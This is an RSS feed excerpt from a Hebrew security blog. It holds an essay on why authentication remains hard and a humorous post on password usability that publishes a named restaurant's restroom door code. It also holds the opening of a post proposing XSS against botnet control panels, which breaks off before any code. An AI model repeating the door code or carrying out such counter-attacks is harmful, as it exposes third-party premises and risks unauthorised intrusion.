<p><a href="http://releases.portswigger.net/2013/09/v1515.html" target="_blank">רשימה מלאה של העדכונים והורדה</a>.</p><p>The post <a href="https://www.saltedhash.co.il/blog/updates-2013-09-25-adhd-nmap-burp/">מבזק עדכונים 25-09-2013: ADHD, Nmap, Burp Suite</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.saltedhash.co.il/blog/updates-2013-09-25-adhd-nmap-burp/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>הזדהות אקטיבית (או: מדוע הזדהות בטוחה עדיין כל כך מסובכת)</title>
		<link>https://www.saltedhash.co.il/blog/active-authentication/</link>
					<comments>https://www.saltedhash.co.il/blog/active-authentication/#comments</comments>
		
		<dc:creator><![CDATA[יוני בן-נון]]></dc:creator>
		<pubDate>Sun, 15 Sep 2013 19:36:17 +0000</pubDate>
				<category><![CDATA[פרטיות]]></category>
		<category><![CDATA[PKI]]></category>
		<category><![CDATA[TLS]]></category>
		<category><![CDATA[הוכחת אפס מידע]]></category>
		<category><![CDATA[הזדהות]]></category>
		<category><![CDATA[הזדהות אקטיבית]]></category>
		<category><![CDATA[הזדהות ביומטרית]]></category>
		<category><![CDATA[הצפנה]]></category>
		<category><![CDATA[פוסט אורח]]></category>
		<category><![CDATA[תקיפת הזדהות]]></category>
		<guid isPermaLink="false">http://www.saltedhash.co.il/?p=642</guid>

					<description><![CDATA[<p>בדיוק שנה עברה מאז ההכרזה המעניינת של דארפה (DARPA) על הכוונה לפתח "הזדהות אקטיבית" אשר תזהה משתמש בהסתמך על דפוסי התנהגותו בשימוש במחשב. אחד מאנשי דארפה מביא אנלוגיה עם מפתחות וכלב – גם אם נכנסתם לבית בעזרת מפתח גנוב, זה לא ישכנע את הכלב שהנכם הבעלים של המקום.</p>
<p>The post <a href="https://www.saltedhash.co.il/blog/active-authentication/">הזדהות אקטיבית (או: מדוע הזדהות בטוחה עדיין כל כך מסובכת)</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></description>
										<content:encoded><![CDATA[<p><strong>שנה וחצי עברה מאז ההכרזה המעניינת של דארפה (<abbr title="The Defense Advanced Research Projects Agency">DARPA</abbr>) על הכוונה לפתח &quot;הזדהות אקטיבית&quot; אשר תזהה משתמש בהסתמך על דפוסי התנהגותו בשימוש במחשב. האם רעיון זה ישים ומעניין, אילו בעיות הוא למעשה מנסה לפתור, ומדוע עדיין לא הצלחנו להפטר מהשימוש בסיסמה?</strong></p>
<blockquote><p>הפעם יש לנו פוסט אורח מאת מר <a href="https://www.saltedhash.co.il/blog/author/johnny/" target="_blank" rel="noopener">יוני בן-נון</a>, מפתח תוכנה ויועץ אבטחת מידע עם כ- 15 שנות ניסיון. כיום יוני עובד כמנהל מוצר בחברת סיסקו בקבוצת ה- Firewall. כאחד היזמים והמפתחים של <a title="Wombat Voting System" href="http://www.wombat-voting.com/" target="_blank" rel="noopener">מערכת בחירות אלקטרונית</a>, ללא ספק יש ליוני מה לומר על נושא ההזדהות והפערים הקיימים. קריאה מהנה!</p></blockquote>
<h2>הנסיון לוויתור על הסיסמה (או: אבולוציית ההזדהות)</h2>
<p>רובכם מכירים בוודאי את <a title="מחשבות על אבטחה מנקודת מבטו של המשתמש הפשוט" href="https://www.saltedhash.co.il/blog/user-thoughts-about-security/" target="_blank" rel="noopener">שיטות ההזדהות מבוססות הסיסמה ואת הבעיות המלוות אותן</a>. הסיסמה הינה סוד אשר אנחנו חושפים באופן מלא או חלקי כדי להוכיח את הזהות שאנחנו טוענים ששייכת לנו. שליחת הסוד באופן גלוי ע&quot;י שליחת הסיסמה כ-plaintext היא כמובן בעייתית מסיבות ברורות. חשיפה &quot;חלקית&quot; של הסוד, באמצעות שימוש בשיטת Digest למשל, מוריד מעט את הסיכון, אבל לא מונע לחלוטין התקפות כגון ממסור (Relay Attack) או מילון (Dictionary Attack). סוד ניתן גם להצפין, אבל אז עדיין נשארות מספר בעיות עקרוניות. בעיה אחת היא שהצד השני צריך לדעת לפתוח את ההצפנה כדי לוודא את הסוד, כלומר לפחות גורם נוסף מלבדינו חייב לדעת ולזכור את הסוד. בעיה נוספת היא שאם כל מה שאנחנו עושים הוא לשדר את הסוד מוצפן, אז מעשית, אם גורם זדוני מאזין, אולי לא משנה לו כלל אם אנחנו משדרים את הסוד מוצפן או גלוי והוא עשוי להאזין ולשדר את הסוד שוב או להשתמש בהתקפת ממסור בהצלחה.</p>
<p>בהתאם, שידור מלא או חלקי של הסוד איננו מוגן גם אם הוא מתבצע על גבי תווך מאובטח כגון TLS או IPSec, אשר הוא לכאורה השלב הטבעי הבא בחיזוק ההגנה על ההזדהות. תווך מוצפן איננו פותר בעיה עקרונית בפרוטוקול ההזדהות. קודם כל, מאחר וההנחה הבסיסית היא שתווך מוצפן ניתן לעקוף. למשל, כי ניתן לקלוט את השידור בקצוות (אולי קשה, אבל אפשרי), לתקוע טריז באמצע (Man In The Middle) או תיאורטית (ומעשית?) לפרוץ אותו. אך יש בעיות המטרידות אותנו יותר בפרוטוקול כגון TLS. בשימוש בפרוטוקול כזה, אנחנו מניחים שלאחר שיצרנו קשר מוצלח עם השרת מהצד השני, ניתן לסמוך עליו, אבל לא בטוח שוידאנו את הזהות שלו כמו שצריך ויתכן שהוא מתחזה. למשל, במידה ואנחנו סומכים על תעודה אשר נחתמה ע&quot;י גורם אשר לא התכוונו לסמוך עליו תמיד. זה יכול לקרות אם גורם זדוני הצליח &quot;להזריק&quot; תעודה זדונית למאגר התעודות שלנו (Trusted Certificate Store), או אם גורם זדוני פרץ את שרשרת התעודות ומסוגל לחתום על תעודות חדשות אשר לכאורה כשרות לכל דבר ועניין &#8211; ראו בעיית זיוף חתימה דיגיטלית (אינספור קישורים באיטרנט, למשל <a href="https://www.schneier.com/blog/archives/2008/12/forging_ssl_cer.html">כאן</a>, <a href="http://www.zdnet.com/blog/security/ssl-broken-hackers-create-rogue-ca-certificate-using-md5-collisions/2339">כאן</a> <a href="http://nakedsecurity.sophos.com/2012/06/07/microsoft-speaks-out-on-flame-malware-certificate-forgery/">וכאן</a>) <a title="המלצת NIST להפסיק להשתמש ב- SHA1" href="http://csrc.nist.gov/groups/ST/hash/policy.html" target="_blank" rel="noopener">והמלצת NIST עוד מ- 2010 להפסיק להשתמש ב- SHA1</a> מספר שנים אחרי שהפסקנו להשתמש ב- MD5 <a href="http://en.wikipedia.org/wiki/MD5#Collision_vulnerabilities">מסיבה דומה</a>. יש כאן שורה של הנחות נסתרות אשר ניתן עקרונית לפרוץ ולעקוף, גם אם במאמץ מורכב. נכון, לא כיסיתי כאן את כל האפשרי והפריצות שנתתי כדוגמה אינן טריוויאליות. אבל למי שמבין את קשת האפשרויות, הרעיון צריך להיות ברור.</p>
<p>וכיצד יכול הצד השני לבדוק אם סיפקנו את הסיסמה הנכונה? אם נבחן את השימושים המקובלים בסיסמה לצורך הזדהות, נראה שלגורם מולו אנחנו מזדהים יש למעשה שלוש אפשרויות בלבד לבצע זאת: ע&quot;י שמירת הסיסמה הגלויה, שמירת הסיסמה המקודדת (לרוב באמצעות גיבוב ממולח) או שמירת הסיסמה כמוצפנת (לרוב באמצעות מפתח סימטרי המוגן בצד השרת). קשה לומר שאחד מפתרונות אלו מספק ב-100%, בהתחשב ביכולת של פורץ בעל משאבים לאחזר את הסיסמה במידה והשיג גישה למסד הנתונים של הסיסמאות (ולמפתח הסימטרי המוזכר לעיל אם נעשה בו שימוש). לכל הפחות נרצה שיהיה ביכולתנו לזכור סיסמאות קשות לפיצוח אשר סיבוכיות הפריצה שלהן גבוהה, ולהוריד במעט את הסיכון. אך איננו מכונות בעלות יכולת כזו, ובכך חזרנו במובן מסוים לנקודת ההתחלה.</p>
<div style="text-align: center;">
<dl id="">
<dt><img loading="lazy" src="https://imgs.xkcd.com/comics/password_strength.png" alt="" width="740" height="601" /></dt>
<dd>קרדיט: xkcd.com</dd>
</dl>
</div>
<p>אנשי אבטחת מידע טובים יעשו עבודה מעולה בהורדת כל הסיכונים המתוארים כאן למינימום, אך חשוב להבין שהפגיעות הבסיסית, הנובעת ממגבלות השימוש שלנו כבני אדם בפרוטוקולים הקיימים (טובים ככל שיהיו), נשארת בעוכרינו.</p>
<p><a title="המלצת DARPA להשתמש בהזדהות ביומטרית" href="https://secureidnews.com/news-item/darpa-recommends-ditching-passwords-using-always-on-biometrics/" target="_blank" rel="noopener">ארגון DARPA ממליץ עקרונית</a> על הפסקת שימוש בסיסמאות לטובת הזדהות ביומטרית ולמעשה איננו &quot;מחזיק&quot; משימוש בסיסמאות, גם כפקטור נוסף. אבל באופן דומה למתואר לעיל, גם שיטת הזיהוי הביומטרי איננה נטולת בעיות. חישבו על כך שמדובר, עקרונית, בהזדהות באמצעות &quot;סוד&quot; אשר אדם נושא עימו. למשל, טביעת אצבע. אם האדם משדר את הסוד במלואו לגורם מולו הוא מזדהה, הרי שהוא חושף את הסוד כך שניתן עקרונית להקליט אותו ולשדר שוב (Replay Attack) לצורך התחזות. אם הגורם המזדהה איננו משדר את הסוד במלואו, הרי שצריך לפתור את הבעיה בדרך אחרת, כגון כך שסומכים על החומרה בנקודת הקצה שתהיה אמינה, אך גם את פתרון זה ניתן לעקוף. מאמינים שטכנולוגיית הזדהות ביומטרית מתוחכמת מספיק? <a title="פוסט משעשע" href="http://www.forbes.com/sites/quora/2013/07/26/what-is-the-most-catastrophic-error-made-by-an-intern-at-a-tech-company/#!" target="_blank" rel="noopener">פוסט משעשע זה</a> מסביר בעקיפין שממש לא. פתרון עדיף ברמה התפישתית לבעיות הנ&quot;ל עשוי להיות בדמות שימוש בפרוטוקול מבוסס <strong>הוכחת אפס מידע</strong>. הרעיון הוא שניתן מתמטית <a href="https://www.sans.org/reading_room/whitepapers/vpns/identification-zero-knowledge-protocols_719" target="_blank" rel="noopener">להוכיח</a> ידיעת סוד מבלי להציג אותו, ובדרך טובה יותר מאשר הסתרה חלקית של הסוד כגון Digest. שילוב פוטנציאלי בין הזדהות ביומטרית לבין פרוטוקול מבוסס הוכחת אפס מידע נראה כמו רעיון מבטיח, אבל ייקח כנראה עוד זמן מה עד שנראה פרוטוקולים כאלו בפעולה בשימוש רחב.</p>
<h2>דילמות ההזדהות כיום</h2>
<p>הקדמה ארוכה זו נועדה להסביר מדוע אנחנו עדיין מחפשים אחרי שיטות הזדהות טובות יותר. אני תוהה כמה משועלי אבטחת המידע יסכימו שאין אלטרנטיבות אשר באמת ובתמים עדיפות על השיטות הקיימות. אין לי מושג מהי הדיעה הרווחת יותר, אך נראה שבאופן גס ניתן לחלק את הדיעות לשתיים:</p>
<ol>
<li>השיטות הקיימות הן סבירות והחשוב ביותר הוא להגיע למימוש נכון ונטול שגיאות של שיטות ההזדהות הקיימות בהיעדר שיטה אחת אולטימטיבית;</li>
<li>בכל שיטות ההזדהות הקיימות פגם בסיסי והחשוב ביותר הוא להבין אותו לעומקו ולנסות למצוא שיטת הזדהות אשר מתמודדת עם פגם זה בהצלחה. פגם זה, כמובן, הוא שהאדם איננו מחשב: לו הייתה לנו את היכולת לבצע בעצמנו חישובים מסובכים ללא מחשב שיתווך, נראה שלפחות מרבית הבעיות בשיטות ההזדהות היו נפתרות.</li>
</ol>
<p>על פניו, הבעיות הקשות יותר בהזדהות קשורות להסתמכות שלנו על מחשב בביצוע בדיקות ועל חוסר היכולת שלנו לזהות כשלים &quot;בעין&quot;. יש כאן מספר הנחות סמויות כגון הצורך שלנו לבטוח בדפדפן כחלק מביצוע ההזדהות. כך בהזדהות מבוססת PKI, למשל, האמינות של ההזדהות נופלת בגלל בעיות כגון <a href="https://www.schneier.com/blog/archives/2005/02/unicode_url_hac_1.html" target="_blank" rel="noopener">קידוד &quot;זדוני&quot;</a> או הצגה למשתמש של תעודה דיגיטלית כתקינה במקרה של <a href="http://www.thoughtcrime.org/papers/null-prefix-attacks.pdf" target="_blank" rel="noopener">בעיית תו-האפס</a>. וכיצד מתמודדים עם בעיות אלו? שאלה טובה. אנחנו נאלצים לנסות ולהמציא חומרה &quot;בטוחה&quot; אשר תגן מכשלי <a title="פיתוח מאובטח" href="https://www.saltedhash.co.il/secure-development/" target="_blank" rel="noopener">אבטחת מידע ברמת התוכנה</a>, לפתח פרוטוקולים אשר מסייעים לנו להפחית את הסיכון שמרמים אותנו, או לכל הפחות להקפיד יותר על אבטחת גורמים שונים בשרשרת ההזדהות כגון הדפדפן. האם אנחנו לוקחים כמובן מאליו את הרעיון שבעיית ההזדהות נשארת מסובכת לביצוע ולפתרון?</p>
<h2>הזדהות אקטיבית</h2>
<p>לפני כחצי שנה בלבד יצאה גוגל <a href="https://www.wired.com/wiredenterprise/2013/01/google-password/" target="_blank" rel="noopener">בהצהרה</a> שהכתה גלים בחדשות וברשתות החברתיות על הכוונה לבטל לאורך זמן את השימוש בהזדהות מבוססת סיסמה לטובת הזדהות באמצעות מכשיר נייד. נדמה שהן מומחים והן הדיוטות הגיבו בתמיהה על הידיעה: הזדהות כפי זו שגוגל רוצה לקדם, כך נראה, תהיה ממש הזזת הבעיה למקום אחר של הגנה על מכשיר נייד (something you have) במקום על סיסמה. חברות נוספות, כגון SlickLogin, מתעתדות להציע <a href="https://techcrunch.com/2013/09/09/slicklogin-wants-to-kill-the-password-by-singing-a-silent-song-to-your-smartphone/" target="_blank" rel="noopener">פתרון דומה</a>. ארגון DARPA, לעומת זאת, יצא לפני שנה וחצי עם מכרז לבניית הזדהות אקטיבית: זיהוי משתמש בהסתמך על דפוסי התנהגותו בשימוש במחשב. אחד מאנשי הארגון פישט את הרעיון כך: גם אם נכנסתם לבית בעזרת מפתח גנוב, זה לא ישכנע את כלב הבית, חיית המחמד של הדיירים, שאתם הבעלים של המקום. נראה כי <a href="https://www.behaviosec.com/darpa-and-behaviosec-go-beyond-passwords/" target="_blank" rel="noopener">חברה אחת עמדה בדרישות המכרז של DARPA</a> ופתחה בתהליך נסיון הפיתוח של טכנולוגיה כזו, אך נחכה עוד זמן מה כדי להיווכח האם הנסיון מוצלח. לבינתיים, אפשר להשתעשע במחשבות כיצד יראה המימוש של כלב ששומר לנו על הבית לצורך הזדהות. אולי <a href="http://soomipark.com/main/wp-content/uploads/2013/06/07-Siniffer-Dog-Authentication1.jpg" target="_blank" rel="noopener">ככה</a>?</p>
<h3>מידע נוסף אודות הזדהות אקטיבית</h3>
<p>נציג DARPA מדבר על הזדהות אקטיבית:</p>
<p><iframe loading="lazy" width="620" height="349" src="https://www.youtube.com/embed/fgNpOzvwOiU?feature=oembed" frameborder="0" gesture="media" allowfullscreen></iframe></p>
<p>מצגת מכנס RSA שבו הציגו את התכנית:</p>
<p><a href="https://www.rsaconference.com/writable/presentations/file_upload/sec-t05_final.pdf">https://www.rsaconference.com/writable/presentations/file_upload/sec-t05_final.pdf</a></p>
<p><strong>חושבים שהפרזנו, לא דיקדקנו, שיעממנו, או סתם גנבנו לכם את הסיסמה? תנו בתגובות. הזדהות מהנה לכולם.</strong></p><p>The post <a href="https://www.saltedhash.co.il/blog/active-authentication/">הזדהות אקטיבית (או: מדוע הזדהות בטוחה עדיין כל כך מסובכת)</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.saltedhash.co.il/blog/active-authentication/feed/</wfw:commentRss>
			<slash:comments>6</slash:comments>
		
		
			</item>
		<item>
		<title>מחשבות על אבטחה מנקודת מבטו של המשתמש הפשוט</title>
		<link>https://www.saltedhash.co.il/blog/user-thoughts-about-security/</link>
					<comments>https://www.saltedhash.co.il/blog/user-thoughts-about-security/#comments</comments>
		
		<dc:creator><![CDATA[ניר ימיני]]></dc:creator>
		<pubDate>Sat, 17 Aug 2013 20:35:27 +0000</pubDate>
				<category><![CDATA[פרטיות]]></category>
		<category><![CDATA[הזדהות חלשה]]></category>
		<category><![CDATA[הכשרת משתמשים]]></category>
		<category><![CDATA[סיסמאות]]></category>
		<category><![CDATA[פרטיות באינטרנט]]></category>
		<guid isPermaLink="false">http://www.saltedhash.co.il/?p=760</guid>

					<description><![CDATA[<p>סיסמה היא שיטת הזדהות בין העתיקות בעולם. עם הזמן דורשים מאיתנו לזכור רצף תווים יותר ארוך ומסורבל, כדי למנוע גישה לא מורשית. אך לרוב דרישה זו אינה מתחשבת במשתמש - הרי אם הלקוח שכח סיסמה, הוא ילך לעסק אחר. או יותר גרוע - ירשום אותה על פתק ויגרום נזק לעסק עצמו בלי לדעת. פוסט אורח מאת ניר ימיני עם מחשבותיו בנושא.</p>
<p>The post <a href="https://www.saltedhash.co.il/blog/user-thoughts-about-security/">מחשבות על אבטחה מנקודת מבטו של המשתמש הפשוט</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></description>
										<content:encoded><![CDATA[<blockquote><p>סיסמה היא שיטת הזדהות בין העתיקות בעולם. עם הזמן דורשים מאיתנו לזכור רצף תווים יותר ארוך ומסורבל, כדי למנוע גישה לא מורשית. אך לרוב דרישה זו אינה מתחשבת במשתמש &#8211; הרי אם הלקוח שכח סיסמה, הוא ילך לעסק אחר. או יותר גרוע &#8211; ירשום אותה על פתק ויגרום נזק לעסק עצמו בלי לדעת. פוסט אורח מאת ניר ימיני עם מחשבותיו בנושא.</p></blockquote>
<h2>יום כיף בירושלים</h2>
<p>היינו ביום כיף בירושלים. אני. גידי ויגו. בירה. ישבנו כמו תמיד בפסטה בסטה, בתוך השוק. אינני שתיין מוצלח במיוחד וכבר באמצע הבירה הראשונה הייתי חייב ללכת לשירותים. לשירותים היה מנעול עם קוד אבטחה. בפעם האחרונה שראיתי מנעול כזה היו עליו 8 ספרות. המנעול הזה כלל 10 ספרות וגם כמה אותיות! ביקשתי מהמלצרית את הסיסמא והיא הביאה לי פתק קטן שאותו לקחתי איתי כדי להקיש את הקוד. בעודי משיב את אוצרותיי לטבע החלטתי לשנן את הקוד בעל פה. התחלה של חמצן &#8211; CO, עשר שנים פחות משנת הלידה שלי &#8211; 72, כפול חמש אבל הפוך &#8211; 5X. יצאתי והחזרתי למלצרית את הפתק עם הסיסמא: CO725X.</p>
<h3>גידי נכנס לעניין</h3>
<p>כשחזרתי לשולחן צחקתי וסיפרתי לגידי שיש לי עכשיו את הסיסמא לשירותים של הפסטה בסטה בשוק מחנה יהודה. שיש להם פרצת אבטחה ושבכל פעם שנעבור פה ביום כיף בירושלים, נוכל להיכנס חופשי לשירותים. גידי צחק והלך גם הוא לשירותים (בדיוק כמו ששיחות על כאבי שיניים עושות כאב שיניים). כשהוא ניגש לדלת, אישה מבוגרת הסבירה לו שהיא לא מצליחה להבין את הסיסמא שהמלצרית נתנה לה ושהדלת לא נפתחת. היא הגישה לו את הפתק כדי שינסה בעצמו. גידי לא היסס, ובהינף יד אמר לה: &quot;אין צורך&quot;. הוא הקליד את הסיסמא בעל פה, ללא הפתק. האישה היתה בהלם.</p>
<div id="attachment_761" style="width: 730px" class="wp-caption aligncenter"><img aria-describedby="caption-attachment-761" loading="lazy" class="size-full wp-image-761 " title="סיסמאות בירושלים" alt="סיסמאות בירושלים" src="http://www.saltedhash.co.il/wp-content/uploads/2013/08/nir.jpg" width="720" height="406" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/08/nir.jpg 720w, https://www.saltedhash.co.il/wp-content/uploads/2013/08/nir-300x169.jpg 300w" sizes="(max-width: 720px) 100vw, 720px" /><p id="caption-attachment-761" class="wp-caption-text">ססמאות בירושלים. בתמונה (מימין לשמאל): גלעד תעסה, ניר ימיני, גידי ויגו.</p></div>
<h3>למה מצפים מאיתנו לזכור כל כך הרבה סיסמאות?</h3>
<p>לא מזמן נרשמתי ללימודי הדוקטורט שלי. האיש מיחידת המחשוב ביקש ממני ליצור סיסמא. אמרתי לו: &quot;nir123&quot;. במבט זועף אך ידידותי הוא הסביר לי מדוע הסיסמא לא מומלצת ושכדאי לי לבחור משהו יותר בטוח. זרקתי לו: &quot;אז שהסיסמא שלי תהיה מספר תעודת הזהות שלי&quot; והוא ענה: &quot;עדיף שתחזור ל- nir123&quot;.</p>
<p>בסופו של דבר יחידת המחשוב המציאה לי סיסמא מבלי שניתנה לי היכולת לשנות אותה. זה אכזרי, אבל זה לא שונה מהקוד שהבנק הנפיק לי למשיכת מזומנים עם הכספומט.</p>
<h2>כשל אבטחתי אינסופי</h2>
<p>עד היום לא הצלחתי להבין, למה מקום לממכר מזון ובירה באמצע שוק מחנה יהודה, צריך לאבטח את דלת השירותים בעזרת מנעול עם קוד? לא יכלו להסתפק במפתח? למה יחידת המחשוב בחיפה המציאה לי סיסמא שאני לא אזכור לעולם? ולמה בנק דיסקונט לא מאפשר לשנות קוד לכספומט?</p>
<p>כנראה שלעולם לא אדע את התשובות לשאלות הללו.</p>
<p>בכל המקרים לעיל, המשתמש הפשוט (אני) רוצה לגשת למקום או למידע שרצוי שיהיה חסום בפני אנשים אחרים. אבל האם אנחנו מונעים את הגישה בדרך הכי פחות פוגענית שניתן?</p>
<p>אני חייב להודות שזה די מביש לשאול מלצרית במקום הומה מה הקוד של השירותים. אני מניח שאוניברסיטת חיפה רוצה להגן על מערכות המחשוב שלה אבל האם שמירת הסיסמא שלהם באימייל שלי הופכת את המערכת למוגנת יותר מאשר nir123? אני לא חושב. אגב, בגלל שאינני זוכר את קוד הכספומט שלי בבנק דיסקונט &#8211; לא ביצעתי משיכת מזומנים כבר למעלה מחצי שנה (תודה לאל שיש לי חשבון אחר שבו אני דווקא כן זוכר את הקוד!).</p>
<p>כאנשים שאיכפת להם מאבטחת מידע וביטחון מידע, אנחנו יודעים שאין מערכת שהיא מוגנת לחלוטין. רשתות ביתיות הן מאוד פרוצות, סיסמאות של דברים חשובים נשמרים תחת אנשי קשר פיקטיביים כמעט בכל טלפון נייד, ואנחנו כ-ן משתמשים באותה סיסמא לכל האתרים שבהם אנחנו גולשים, בניגוד מוחלט להמלצה להחליף סיסמא עבור כל אתר (כן כן, יש המלצה כזו).</p>
<p>עלינו לזכור לאזן תמיד בין סיסמא נוחה וגישה יעילה נוחה למידע שלנו, לחסימת מידע מפני פריצות וגניבות.</p>
<p>וזיכרו, בפעם הבאה שתהיו בשירותים של פסטה בסטה בשוק מחנה יהודה CO725X &#8211; תגידו שניר שלח אתכם.</p><p>The post <a href="https://www.saltedhash.co.il/blog/user-thoughts-about-security/">מחשבות על אבטחה מנקודת מבטו של המשתמש הפשוט</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.saltedhash.co.il/blog/user-thoughts-about-security/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>האנטומיה של בוט, פרק 2: ההגנה הכי טובה היא התקפה</title>
		<link>https://www.saltedhash.co.il/blog/detecting-botnet/</link>
					<comments>https://www.saltedhash.co.il/blog/detecting-botnet/#comments</comments>
		
		<dc:creator><![CDATA[לאוניד יזרסקי]]></dc:creator>
		<pubDate>Sat, 25 May 2013 21:32:35 +0000</pubDate>
				<category><![CDATA[פרטיות]]></category>
		<category><![CDATA[SQLi]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[אנטיוירוס]]></category>
		<category><![CDATA[בוט]]></category>
		<category><![CDATA[בוטנט]]></category>
		<category><![CDATA[סוס טרויאני]]></category>
		<guid isPermaLink="false">http://www.saltedhash.co.il/?p=710</guid>

					<description><![CDATA[<p>בפרק הקודם סקרתי מה זה בוטנט ואיך הוא עובד והבטחתי לספר על שיטות התגוננות מקוריות שלא קשורות ליכולות זיהוי של האנטיוירוס. והבטחות צריך לקיים, גם עם איחור קל.</p>
<p>The post <a href="https://www.saltedhash.co.il/blog/detecting-botnet/">האנטומיה של בוט, פרק 2: ההגנה הכי טובה היא התקפה</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></description>
										<content:encoded><![CDATA[<p><strong>בפרק הקודם סקרתי <a title="מבוא לבוטנטים" href="http://www.saltedhash.co.il/blog/what-is-botnet/">מה זה בוטנט ואיך הוא עובד</a> והבטחתי לספר על שיטות התגוננות מקוריות שלא קשורות ליכולות זיהוי של האנטיוירוס. והבטחות צריך לקיים, גם עם איחור קל.</strong></p>
<p>במהלך כתיבת פוסט זה נתקפתי מספר פעמים ע&quot;י תחושת déjà vu. אולי בגלל שאני מרגיש שעם שיטות ההגנה כיום אנחנו עדיין מפדלים במקום, אולי בגלל חולשות מיושנות (אך עדיין נפוצות) שקיימות לחלק מהבוטנטים בממשק ניהול, ואולי פשוט כי יש לי bad sectors בזכרון לטווח ארוך.</p>
<h2>איך מגלים סוסים טרויאנים?</h2>
<p>סוס טרויאני זו שיטה מאוד נפוצה לשייך את המחשב לבוטנט. בעצם, אפשר לקרוא לו סוג של client שעובד מול שרת השליטה. אבל איך לגלות שהודבקנו ב- trojan? לרובכם בטח מותקן אנטיוירוס על המחשב. השיטה הנפוצה של עבודת האנטיוירוס היא על בסיס חתימות. כלומר, בהינתן קובץ זדוני, ניתן לבנות סדרה של מאפיינים המזהים את הקובץ חד ערכית. תחשבו על פעולה פשוטה של ביצוע hash על הקובץ שהמשתמש מנסה להריץ והשוואתו מול בסיס נתונים של חתימות קבצים שזוהו כזדוניים. כמובן שהאלגוריתם האמתי קצת יותר מסובך. שיטה זו עבדה מצוין במשך שנים רבות, כאשר הווירוסים היו פרימיטיביים והמטרה העיקרית של חברות האנטיוירוס הייתה להוציא עדכון חתימות לפני שהווירוס החדש יתפשט. לכן, <strong>חשוב מאוד תמיד להתעדכן בזמן</strong>.</p>
<p>אך שיטה בסיסית זו בלבד כבר אינה מספקת. כותבי הווירוסים למדו לבנות <a title="תוכנות פולימורפיות" href="http://en.wikipedia.org/wiki/Polymorphic_code" target="_blank">תוכנות פולימורפיות</a> – תוכנה שבה קובץ ההרצה נראה שונה כל פעם שבונים אותו, אך מבצע את אותו האלגוריתם. זה הופך את השיטה של חתימות לבלתי יעילה, מכיוון שאי אפשר לעקוב אחרי אלפי תצורות של אותו סוס טרויאני, כאשר עשרות צורותיו השונות מתווספות כול יום. חברות האנטיוירוס מנסות לעמוד במאמץ ומוסיפות תכונות האוריסטיות למוצריהם, המאפשרות לזהות תוכנות זדוניות על פי אופן פעולתן, התנהגות, ביצוע הנדסה הפוכה והרצה בסביבה מנותקת (sandbox).</p>
<p>ובכל זאת, שיטות ההגנה תמיד נשארות צד אחד מאחור.</p>
<h2>שיטות אקטיביות לבדיקה האם המחשב שייך לבוטנט</h2>
<p>לאחר הקמת המעבדה הקטנה שלי לחקירת בוטנטים נפוצים, התחלתי לחשוב על שיטה מקורית איך אפשר לקבל התרעות על כך, האם המכונה שלי הודבקה ושייכת לבוטנט. שיטה שתעבוד בין אם מותקן לי אנטיוירוס על המחשב, או לא. לפני שאסביר על מה מדובר, הנה מספר עובדות שלמדתי במחקר הקטן שלי:</p>
<ul>
<li>רוב הבוטנטים מדווחים לשרת ווב רגיל (שרט השליטה) בעל תצורה של PHP + MySQL;</li>
<li>תוכן המסר המועבר מהבוט לשרת מוצפן ברוב המקרים על ידי מפתח שהופץ עם הבוט עצמו (pre-shared key), אך התעבורה היא HTTP רגיל;</li>
<li>כול רכיבי הבוטנט, גם השרת וגם הבוט עצמו, נכתבים לרוב על ידי תכניתן אחד.</li>
</ul>
<p>שלושת הנקודות הנ&quot;ל, ובעיקר האחרונה, גיבשו לי רעיון מעניין. אנשים הפחות בקיאים בתכנות כנראה לא יבינו למה דווקא הנקודה השלישית כ&quot;כ חשובה. אסביר את עצמי. תחום התוכנה רחב מאוד, פיתוח אפליקציות ווב שונה מהותית מכתיבת תוכנות שרצות על המחשב האישי או המכשיר הנייד. בדרך כלל אנשים מתמחים רק באחד מהם, כאשר השאר יכולים להיות ברמת התחביב. העובדה שמדובר על פיתוח תוכנה זדונית רק מגדיל את הפער. ולכן חשבתי לעצמי – אם מפתחים רגילים לא תמיד מצליחים ליצור אפליקציית ווב מאובטחת וחסרת פערים, אז למה שמפתחי הסוסים הטרויאנים יהיו יותר טובים ביצירת אתר שליטה והניהול (<abbr title="Command and Control">C&amp;C</abbr>) של הבוטנט חסין? בסופו של דבר, גם באבטחת מידע תחומי ההגנה וההתקפה הם תחומים שונים, ומקצועיות באחד מהם לא מבטיח בהכרח מומחיות בשני (אך תורם לו רבות ללא ספק).</p>
<p>להלן אני הולך להציג שתי שיטות אקטיביות לזיהוי פעילות חשודה במחשב. שיטות אלו נועדו לשימוש אנשים בעלי ניסיון מינימלי בתחום הרשתות וה- web, מכיוון שדורשות ידע בסיסי בתחזוקת שרתים ותקיפות אתרים, ושימוש בסיסי ב- network sniffer. אבל זה לא קשה, תאמינו לי.</p>
<h3>1. Cross-site scripting</h3>
<p>כפי שהסברתי בפוסט על <a title="מבנה הבוטנט" href="http://www.saltedhash.co.il/blog/what-is-botnet/" target="_blank">מבנה הבוטנט</a>, לרוב בשרתי command and control נאגר מידע אודות פרטים טכניים של המחשב הנדבק. בדרך כלל זה כתובת IP וסוג מערכת הפעלה. אך לרוב נכלל גם מידע נוסף כגון שם המחשב, מיקום (מהגדרות במערכת הפעלה), שם משתמש שמחובר כרגע, צילום מסך ועוד.</p>
